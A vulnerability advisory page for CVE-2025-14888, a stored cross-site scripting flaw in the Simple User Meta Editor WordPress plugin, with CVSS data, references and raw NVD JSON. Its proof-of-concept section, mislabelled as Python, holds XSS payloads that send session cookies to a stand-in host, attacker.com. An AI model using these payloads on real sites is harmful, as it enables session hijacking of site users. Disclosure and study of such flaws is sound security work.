CVE-2025-14888

Description

The Simple User Meta Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user meta value field in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.

CVSS Details

CVSS Score

4.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Simple User Meta Editor <= 1.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-14888 PoC - Simple User Meta Editor Stored XSS
// Target: WordPress with Simple User Meta Editor plugin <= 1.0.0
// Attack Vector: Stored XSS via user meta value field

// Step 1: Authenticate as administrator on WordPress site
// Step 2: Navigate to User Meta Editor interface
// Step 3: Inject malicious JavaScript into any user meta field

// Example malicious payload:
// <script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
// or
// <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

// PoC JavaScript execution chain:
const payload = '<script>fetch("https://attacker.com/log?data="+btoa(document.cookie))</script>';

// When victim views the affected page, the script executes and exfiltrates session cookies.
// This allows attacker to hijack authenticated sessions.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14888
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14888
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14888/
[4] VulDB https://vuldb.com/cve/CVE-2025-14888
[5] https://plugins.trac.wordpress.org/browser/simple-user-meta-editor/tags/1.0.0/includes/templates/editor/index.php#L57
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/37342a62-97cd-43ef-af27-33092e840e67?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14888", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:57.637", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Simple User Meta Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user meta value field in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/simple-user-meta-editor/tags/1.0.0/includes/templates/editor/index.php#L57", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/37342a62-97cd-43ef-af27-33092e840e67?source=cve", "source": "[email protected]"}]}}